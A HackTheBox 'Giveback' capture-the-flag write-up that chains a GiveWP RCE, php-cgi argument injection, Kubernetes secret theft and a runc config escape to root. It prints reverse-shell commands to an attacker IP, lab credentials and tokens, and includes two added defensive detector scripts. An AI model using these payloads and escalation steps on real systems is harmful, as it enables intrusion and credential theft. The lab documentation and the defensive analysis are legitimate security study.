HackTheBox-Giveback

I had a dream of gripping your throat

On an afternoon when the sunlight was just right

With eyes that seemed about to brim over with tears

Watching your slender neck twitch


Information Gathering

 ./rustscan -a 10.10.11.94 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.94:22
Open 10.10.11.94:80
Open 10.10.11.94:30686
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-17 19:03 EST
Initiating Ping Scan at 19:03
Scanning 10.10.11.94 [4 ports]
Completed Ping Scan at 19:03, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:03
Completed Parallel DNS resolution of 1 host. at 19:03, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:03
Scanning 10.10.11.94 [3 ports]
Discovered open port 80/tcp on 10.10.11.94
Discovered open port 22/tcp on 10.10.11.94
Discovered open port 30686/tcp on 10.10.11.94
Completed SYN Stealth Scan at 19:03, 0.16s elapsed (3 total ports)
Nmap scan report for 10.10.11.94
Host is up, received echo-reply ttl 63 (0.095s latency).
Scanned at 2025-11-17 19:03:40 EST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 62
30686/tcp open unknown syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
Raw packets sent: 7 (284B) | Rcvd: 4 (160B)

 docker run -it --rm wpscanteam/wpscan --url http://10.10.11.94/              
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://10.10.11.94/ [10.10.11.94]
[+] Started: Tue Nov 18 00:35:03 2025

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: nginx/1.28.0
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] robots.txt found: http://10.10.11.94/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] WordPress readme found: http://10.10.11.94/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] WordPress version 6.8.1 identified (Insecure, released on 2025-04-30).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.11.94/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.8.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.11.94/, Match: 'WordPress 6.8.1'

[+] WordPress theme in use: bizberg
| Location: http://10.10.11.94/wp-content/themes/bizberg/
| Latest Version: 4.2.9.79 (up to date)
| Last Updated: 2024-06-09T00:00:00.000Z
| Readme: http://10.10.11.94/wp-content/themes/bizberg/readme.txt
| Style URL: http://10.10.11.94/wp-content/themes/bizberg/style.css?ver=6.8.1
| Style Name: Bizberg
| Style URI: https://bizbergthemes.com/downloads/bizberg-lite/
| Description: Bizberg is a perfect theme for your business, corporate, restaurant, ingo, ngo, environment, nature,...
| Author: Bizberg Themes
| Author URI: https://bizbergthemes.com/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 4.2.9.79 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.11.94/wp-content/themes/bizberg/style.css?ver=6.8.1, Match: 'Version: 4.2.9.79'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] *
| Location: http://10.10.11.94/wp-content/plugins/*/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.

[+] give
| Location: http://10.10.11.94/wp-content/plugins/give/
| Last Updated: 2025-11-05T14:00:00.000Z
| [!] The version is out of date, the latest version is 4.13.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By:
| Urls In 404 Page (Passive Detection)
| Meta Tag (Passive Detection)
| Javascript Var (Passive Detection)
|
| Version: 3.14.0 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| - http://10.10.11.94/wp-content/plugins/give/assets/dist/css/give.css?ver=3.14.0
| Confirmed By:
| Meta Tag (Passive Detection)
| - http://10.10.11.94/, Match: 'Give v3.14.0'
| Javascript Var (Passive Detection)
| - http://10.10.11.94/, Match: '"1","give_version":"3.14.0","magnific_options"'

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:17 <============================================================================> (137 / 137) 100.00% Time: 00:00:17

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Nov 18 00:35:28 2025
[+] Requests Done: 173
[+] Cached Requests: 7
[+] Data Sent: 42.972 KB
[+] Data Received: 290.97 KB
[+] Memory used: 272.395 MB
[+] Elapsed time: 00:00:24

GetShell1


Brute-forcing usernames got nowhere, so I turned to the plugins: the GiveWP plugin is an old version with an exploitable CVE.

EQSTLab/CVE-2024-5932: GiveWP PHP Object Injection exploit

python3 CVE-2024-5932-rce.py -u "http://giveback.htb/donations/the-things-we-need/" -c "bash -c 'bash -i >& /dev/tcp/10.10.16.20/4444 0>&1'"
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from beta-vino-wp-wordpress-685554584c-sq2j9-10.10.11.94-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Python agent cannot be deployed. I need to maintain at least one basic session to handle the PTY
[+] Attempting to spawn a reverse shell on 10.10.16.20:4444
[+] Got reverse shell from beta-vino-wp-wordpress-685554584c-sq2j9-10.10.11.94-Linux-x86_64 😍 Assigned SessionID <2>
[+] Shell upgraded successfully using /usr/bin/script! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/beta-vino-wp-wordpress-685554584c-sq2j9~10.10.11.94_Linux_x86_64/2025_11_17-19_45_05-633.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
id
uid=1001 gid=0(root) groups=0(root),1001
I have no name!@beta-vino-wp-wordpress-685554584c-sq2j9:/opt/bitnami/wordpress/wp-admin$

Wait, straight to root?

It must be a virtual machine.

I have no name!@beta-vino-wp-wordpress-685554584c-sq2j9:/opt/bitnami/wordpress/wp-admin$ env
SHELL=/usr/bin/bash
BETA_VINO_WP_MARIADB_SERVICE_PORT=3306
KUBERNETES_SERVICE_PORT_HTTPS=443
WORDPRESS_SMTP_PASSWORD=
WORDPRESS_SMTP_FROM_EMAIL=
BETA_VINO_WP_WORDPRESS_PORT_443_TCP_PORT=443
WEB_SERVER_HTTP_PORT_NUMBER=8080
WORDPRESS_RESET_DATA_PERMISSIONS=no
KUBERNETES_SERVICE_PORT=443
WORDPRESS_EMAIL=user@example.com
WP_CLI_CONF_FILE=/opt/bitnami/wp-cli/conf/wp-cli.yml
WORDPRESS_DATABASE_HOST=beta-vino-wp-mariadb
MARIADB_PORT_NUMBER=3306
MODULE=wordpress
WORDPRESS_SMTP_FROM_NAME=FirstName LastName
HOSTNAME=beta-vino-wp-wordpress-685554584c-sq2j9
WORDPRESS_SMTP_PORT_NUMBER=
BETA_VINO_WP_MARIADB_PORT_3306_TCP_PROTO=tcp
WORDPRESS_EXTRA_CLI_ARGS=
APACHE_BASE_DIR=/opt/bitnami/apache
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PORT=5000
APACHE_VHOSTS_DIR=/opt/bitnami/apache/conf/vhosts
WEB_SERVER_DEFAULT_HTTP_PORT_NUMBER=8080
WP_NGINX_SERVICE_PORT_80_TCP=tcp://10.43.4.242:80
WORDPRESS_ENABLE_DATABASE_SSL=no
WP_NGINX_SERVICE_PORT_80_TCP_PROTO=tcp
APACHE_DAEMON_USER=daemon
BITNAMI_ROOT_DIR=/opt/bitnami
LEGACY_INTRANET_SERVICE_SERVICE_HOST=10.43.2.241
WORDPRESS_BASE_DIR=/opt/bitnami/wordpress
WORDPRESS_SCHEME=http
WORDPRESS_LOGGED_IN_SALT=
BETA_VINO_WP_WORDPRESS_PORT_80_TCP=tcp://10.43.61.204:80
WORDPRESS_DATA_TO_PERSIST=wp-config.php wp-content
WORDPRESS_HTACCESS_OVERRIDE_NONE=no
WORDPRESS_DATABASE_SSL_CERT_FILE=
APACHE_HTTPS_PORT_NUMBER=8443
PWD=/opt/bitnami/wordpress/wp-admin
OS_FLAVOUR=debian-12
WORDPRESS_SMTP_PROTOCOL=
WORDPRESS_CONF_FILE=/opt/bitnami/wordpress/wp-config.php
LEGACY_INTRANET_SERVICE_PORT_5000_TCP=tcp://10.43.2.241:5000

Many internal ports are exposed, and there are KUBERNETES variables, so this is presumably a k8s cluster.

Let's take a look at port 5000 first.

Good grief, this container gives you almost no commands to work with; let's look at the internal network services first.

I have no name!@beta-vino-wp-wordpress-685554584c-sq2j9:/tmp$ cat /etc/hosts
# Kubernetes-managed hosts file.
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
fe00::0 ip6-mcastprefix
fe00::1 ip6-allnodes
fe00::2 ip6-allrouters
10.42.1.249 beta-vino-wp-wordpress-685554584c-sq2j9

# Entries added by HostAliases.
127.0.0.1 status.localhost

Here I use the file transfer method shared by Enchanter.

kali:

nc -lvnp 9999 < socat-linux-amd64 

Victim machine:

I have no name!@beta-vino-wp-wordpress-685554584c-sq2j9:/tmp$ exec 3<>/dev/tcp/10.10.16.20/9999 
I have no name!@beta-vino-wp-wordpress-685554584c-sq2j9:/tmp$ cat <&3 > socat
I have no name!@beta-vino-wp-wordpress-685554584c-sq2j9:/tmp$ exec 3>&-

After that, socat forwarded the port out to the external network without trouble.

GetShell2


php-cgi was mentioned, so it can be leveraged here to get another reverse shell.

PHP CGI Module 8.3.4 - Remote Code Execution (RCE) - PHP webapps Exploit

php -r '$p="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.20 9999 > /tmp/f"; $o = ["http"=>["method"=>"POST", "header"=>"Content-Type: application/x-www-form-urlencoded","content"=>$p,"timeout"=>4]]; $c=stream_context_create($o); $r=@file_get_contents("http://legacy-intranet-service:5000/cgi-bin/php-cgi?--define+allow_url_include%3don+--define+auto_prepend_file%3dphp://input",false,$c); echo $r===false?"":substr($r,0,5000);'
 ./penelope.py 9999
[+] Listening for reverse shells on 0.0.0.0:9999 127.0.0.1 192.168.21.128 172.18.0.1 172.17.0.1 10.10.16.20
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from legacy-intranet-cms-6f7bf5db84-jm6bz-10.10.11.94-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Python agent cannot be deployed. I need to maintain at least one basic session to handle the PTY
[+] Attempting to spawn a reverse shell on 10.10.16.20:9999
[+] Got reverse shell from legacy-intranet-cms-6f7bf5db84-jm6bz-10.10.11.94-Linux-x86_64 😍 Assigned SessionID <2>
[+] Shell upgraded successfully using /usr/bin/script! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/legacy-intranet-cms-6f7bf5db84-jm6bz~10.10.11.94_Linux_x86_64/2025_11_17-20_15_58-173.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
/var/www/html/cgi-bin #
/var/www/html/cgi-bin # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
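A detection-side counterpart, added here as an example and not part of the original writeup: it scans web access-log lines for the php-cgi argument-injection shape used in the request above (PHP ini directives smuggled through the query string) and also catches the soft-hyphen encoding that CVE-2024-4577 relies on. The log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# PHP ini directives that only make sense if the query string has become
# php-cgi's argv, as in the request used against the intranet service above.
SUSPICIOUS_DIRECTIVES = ("allow_url_include", "auto_prepend_file", "php://input")

# Combined-log style line; only the request line is needed.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_php_cgi_arg_injection(target: str) -> bool:
    """True when the request target looks like php-cgi argument injection."""
    path, _, query = target.partition("?")
    if "cgi-bin" not in path and not path.endswith((".php", "php-cgi")):
        return False
    # latin-1 keeps %AD as '\xad': the soft hyphen that some Windows code pages
    # best-fit map to '-' before php-cgi parses its arguments (CVE-2024-4577).
    decoded = unquote_plus(query, encoding="latin-1").lstrip()
    if not decoded.startswith(("-", "\xad")):
        return False
    return any(d in decoded for d in SUSPICIOUS_DIRECTIVES)


def scan_access_log(lines) -> list:
    """Return the request targets in `lines` that match the injection pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m and is_php_cgi_arg_injection(m.group("target")):
            hits.append(m.group("target"))
    return hits


# Constructed sample log lines: one benign php-cgi request, the query-string
# shape seen on this page, and a soft-hyphen variant.
SAMPLE_LOG = [
    '10.42.1.249 - - [17/Nov/2025:20:15:58 +0000] "GET /cgi-bin/php-cgi?page=1 HTTP/1.1" 200 512',
    '10.42.1.249 - - [17/Nov/2025:20:15:59 +0000] "POST /cgi-bin/php-cgi?--define+allow_url_include%3don+--define+auto_prepend_file%3dphp://input HTTP/1.1" 200 0',
    '10.42.1.250 - - [17/Nov/2025:20:16:01 +0000] "GET /index.php?%ADd+allow_url_include%3don HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for t in scan_access_log(SAMPLE_LOG):
        print("php-cgi argument injection:", t)
```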

The second VM

Here you need to consult the k8s documentation.

Kubernetes Enumeration - HackTricks Cloud

First find the token; it is usually at this default path.

/run/secrets/kubernetes.io/serviceaccount # ls -al
total 4
drwxrwxrwt 3 root root 140 Nov 18 00:24 .
drwxr-xr-x 3 root root 4096 Nov 18 00:52 ..
drwxr-xr-x 2 root root 100 Nov 18 00:24 ..2025_11_18_00_24_59.298758859
lrwxrwxrwx 1 root root 31 Nov 18 00:24 ..data -> ..2025_11_18_00_24_59.298758859
lrwxrwxrwx 1 root root 13 Nov 17 19:33 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root 16 Nov 17 19:33 namespace -> ..data/namespace
lrwxrwxrwx 1 root root 12 Nov 17 19:33 token -> ..data/token
/run/secrets/kubernetes.io/serviceaccount # cat token
eyJhbGciOiJSUzI1NiIsImtpZCI6Inp3THEyYUhkb19sV3VBcGFfdTBQa1c1S041TkNiRXpYRS11S0JqMlJYWjAifQ.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.PvzmCQj3JKPg7hksaCIQE6vPYwWk-vG_vAuqZpvYjQ-lMdgwDyd2wtJN4BVnobAcMJvPzinwkJZ4eKyvSO3NV9x64fgokfh9Iq33CtA-DnetRd0ERSdVxXkMryihWyZuo8ODOBk2YkH0VyTrENVdvqnkN_qZzeMKZTC7zs1XgHLgl-zZKH6urFQZi6PKdpkIj4r4TOnHfl98A7vaxvbY0CSgNXhR6m4yZUxQvW0-XUErPU7kPRa1Qqhl9i6sJ0L6kzRAR_qEwEAlP3Z3a6bQOBy92UpUISZrdQ_7EkUUdqtopRIe-p1tuhP0rhDmR0YoJiXRb-QsTTF9SdGJHtAoGw/run/secrets/kubernetes.io/serviceaccount #

Then locate the local k8s API port.

/run/secrets/kubernetes.io/serviceaccount # env
KUBERNETES_PORT=tcp://10.43.0.1:443
KUBERNETES_SERVICE_PORT=443
HOSTNAME=legacy-intranet-cms-6f7bf5db84-jm6bz

Token=eyJhbGciOiJSUzI1NiIsImtpZCI6Inp3THEyYUhkb19sV3VBcGFfdTBQa1c1S041TkNiRXpYRS11S0JqMlJYWjAifQ.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.S_jH6qKcVUzi6fm8ZDb20TQnHhQZIZltOukgp4TpoEWsi9mbscb37ds-RoOfPWcOzG-V93Hl7hRsd_f67wFfs6KCvxLaZWnYuQhTIJtm2xMfyBG4O1w2Voi4xhMSjNTG_yRMC1AvM-i3v05oTH1s2K-1wehLEF4JDFtaw27iVKIBKEsrejzObJ9tWe7oBO4h5I-UztaPAMK6jehcFiWacH5MwvAB0xC6NG6xGttBtaecu1fXOFh6Ryr0l03oITzFwxyyPfkAFnadpOxeVY6X_I7Tv5kKigYAKkarAyXf2HxUOprIxwmI2JS3o2F_Vj5lW0sG1oTfcBkAZmznZec9yw
BETA_VINO_WP_WORDPRESS_PORT_443_TCP_PORT=443
BETA_VINO_WP_WORDPRESS_PORT_443_TCP_PROTO=tcp
SHELL=/bin/sh
BETA_VINO_WP_WORDPRESS_SERVICE_PORT_HTTP=80
WP_NGINX_SERVICE_SERVICE_PORT_HTTP=80
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT_443_TCP=tcp://10.43.0.1:443
PHPIZE_DEPS=autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2c
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_ADDR=10.43.2.241
KUBERNETES_SERVICE_HOST=10.43.0.1
PWD=/var/www/html/cgi-bin
PHP_SHA256=b0a996276fe21fe9ca8f993314c8bc02750f464c7b0343f056fb0894a8dfa9d1
BETA_VINO_WP_WORDPRESS_PORT_443_TCP=tcp://10.43.61.204:443
BETA_VINO_WP_WORDPRESS_SERVICE_PORT_HTTPS=443
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PORT=5000
BETA_VINO_WP_WORDPRESS_SERVICE_HOST=10.43.61.204
WP_NGINX_SERVICE_SERVICE_HOST=10.43.4.242
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PROTO=tcp
LEGACY_INTRANET_SERVICE_SERVICE_PORT_HTTP=5000
/var/www/html/cgi-bin # curl -k -H "Authorization: Bearer $Token" https://10.43.0.1:443/api/v1/namespaces/default/secrets

  "metadata": {
"name": "user-secret-babywyrm",
"namespace": "default",
"uid": "43c29d37-1f8d-4958-a077-045068e46db2",
"resourceVersion": "2857705",
"creationTimestamp": "2025-11-17T19:33:24Z",
"ownerReferences": [
{
"apiVersion": "bitnami.com/v1alpha1",
"kind": "SealedSecret",
"name": "user-secret-babywyrm",
"uid": "af0b09ab-723f-4b29-99ff-808c7fbd1fc6",
"controller": true
}
],
"managedFields": [
},
"data": {
"MASTERPASS": "VlNPQW02T3JMMUJ5WjJmOEs4OU5JTldmRG55TUhldQ=="
},
"type": "Opaque"
}
]

Getbabywyrm


This gives the user babywyrm and a base64-encoded password.

Logging in over SSH succeeds.

 ssh babywyrm@10.10.11.94
The authenticity of host '10.10.11.94 (10.10.11.94)' can't be established.
ED25519 key fingerprint is SHA256:QW0UEukNwOzzXzOIYR311JYiuhYUEv8FYbRgwiKZ35g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.94' (ED25519) to the list of known hosts.
babywyrm@10.10.11.94's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-124-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Tue Nov 18 01:16:40 2025 from 10.10.16.20
babywyrm@giveback:~$ cat user.txt

babywyrm@giveback:~$ sudo -l
Matching Defaults entries for babywyrm on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, timestamp_timeout=0,
timestamp_timeout=20

User babywyrm may run the following commands on localhost:
(ALL) NOPASSWD: !ALL
(ALL) /opt/debug

But running sudo here also asks for some administrative password.

babywyrm@giveback:~$ sudo /opt/debug
[sudo] password for babywyrm:
[*] Validating sudo privileges...
[*] Sudo validation successful
Please enter the administrative password:

Error: Incorrect administrative password

Tried everywhere and couldn't find it...

Root


In the end it turned out to be the password from wp-config.

sW5sp4spa3u7RLyetrekE4oS
babywyrm@giveback:/tmp$ sudo /opt/debug --help
[*] Validating sudo privileges...
[*] Sudo validation successful
Please enter the administrative password:

[*] Administrative password verified
[*] Processing command: --help
Restricted runc Debug Wrapper

Usage:
/opt/debug [flags] spec
/opt/debug [flags] run <id>
/opt/debug version | --version | -v

Flags:
--log <file>
--root <path>
--debug

babywyrm@giveback:/$ sudo /opt/debug -v
[*] Validating sudo privileges...
[*] Sudo validation successful
Please enter the administrative password:

[*] Administrative password verified
[*] Processing command: -v
runc version 1.1.11
commit: v1.1.11-0-g4bccb38c
spec: 1.0.2-dev
go: go1.20.12
libseccomp: 2.5.4

runc series (2): the specification (config.json) file explained, resource configuration in a container's config.json (CSDN blog)

Following that article, create a malicious config file to escalate privileges.

babywyrm@giveback:/tmp/pwn$ cat config.json 
{
"ociVersion": "1.0.2-dev",
"process": {
"terminal": true,
"user": {
"uid": 0,
"gid": 0
},
"args": [
"sh"
],
"env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"TERM=xterm"
],
"cwd": "/",
"rlimits": [
{
"type": "RLIMIT_NOFILE",
"hard": 1024,
"soft": 1024
}
]
},
"root": {
"path": "/",
"readonly": false
},
"mounts": [],
"linux": {
"resources": {
"devices": [
{
"allow": true,
"access": "rwm"
}
]
},
"namespaces": []
}
}

babywyrm@giveback:~$ mkdir -p root/rootfs
babywyrm@giveback:~$ cd root/
babywyrm@giveback:~/root$ vim config.json
babywyrm@giveback:~/root$ sudo /opt/debug run test
[*] Validating sudo privileges...
[*] Sudo validation successful
Please enter the administrative password:

[*] Administrative password verified
[*] Processing command: run
[*] Starting container: test
babywyrm@giveback:~/root$ /tmp/root bash -p
rootbash-5.1# id
uid=1000(babywyrm) gid=1000(babywyrm) euid=0(root) groups=1000(babywyrm)
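The check a wrapper like /opt/debug should have run on config.json before handing it to runc, added here as an example (it is not the box's wrapper nor part of the writeup): it flags exactly the settings the spec above relies on, a host root path, an empty namespaces list, a wildcard device rule and uid 0 without a user namespace. The bundle directory and both sample configs are constructed for illustration.

```python
import os

# Namespaces that `runc spec` places in a default config. An empty list,
# as in the config.json shown in the writeup, means all of them are shared
# with the host.
REQUIRED_NAMESPACES = {"pid", "mount", "ipc", "uts", "network"}


def audit_oci_config(cfg: dict, bundle_dir: str) -> list:
    """Return findings for an OCI runtime config; an empty list means it passed.
    bundle_dir holds config.json: a relative root.path resolves against it,
    and the rootfs must stay inside it."""
    findings = []
    bundle = os.path.normpath(bundle_dir)

    # 1. Root filesystem: never the host root, never outside the bundle.
    path = cfg.get("root", {}).get("path", "rootfs")
    resolved = os.path.normpath(path if os.path.isabs(path) else os.path.join(bundle, path))
    if resolved == "/":
        findings.append("root.path is the host root filesystem")
    elif not resolved.startswith(bundle + os.sep):
        findings.append("root.path escapes the bundle directory: " + resolved)

    linux = cfg.get("linux", {})
    # 2. Namespaces: every isolation namespace must be present.
    present = {ns.get("type") for ns in linux.get("namespaces", [])}
    missing = sorted(REQUIRED_NAMESPACES - present)
    if missing:
        findings.append("shares host namespaces: " + ", ".join(missing))

    # 3. Device cgroup: allow=true without type/major/minor is a wildcard rule.
    for rule in linux.get("resources", {}).get("devices", []):
        if rule.get("allow") and not any(k in rule for k in ("type", "major", "minor")):
            findings.append("wildcard device access: " + rule.get("access", ""))

    # 4. uid 0 with no user namespace is real root on the host.
    if cfg.get("process", {}).get("user", {}).get("uid") == 0 and "user" not in present:
        findings.append("process runs as uid 0 without a user namespace")
    return findings


# Constructed copy of the writeup's config.json, trimmed to the fields that matter.
WRITEUP_CONFIG = {
    "process": {"user": {"uid": 0, "gid": 0}, "args": ["sh"], "cwd": "/"},
    "root": {"path": "/", "readonly": False},
    "mounts": [],
    "linux": {"resources": {"devices": [{"allow": True, "access": "rwm"}]}, "namespaces": []},
}

# Constructed hardened counterpart: rootfs inside the bundle, unprivileged uid,
# the default namespaces, device access denied.
HARDENED_CONFIG = {
    "process": {"user": {"uid": 1000, "gid": 1000}, "args": ["sh"], "cwd": "/"},
    "root": {"path": "rootfs", "readonly": True},
    "mounts": [],
    "linux": {"resources": {"devices": [{"allow": False, "access": "rwm"}]},
              "namespaces": [{"type": t} for t in sorted(REQUIRED_NAMESPACES)]},
}

if __name__ == "__main__":
    for f in audit_oci_config(WRITEUP_CONFIG, "/home/babywyrm/root"):
        print("REJECT:", f)
```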


http://example.com/2025/11/18/HackTheBox-Giveback/
Author: Skyarrow
Posted on November 18, 2025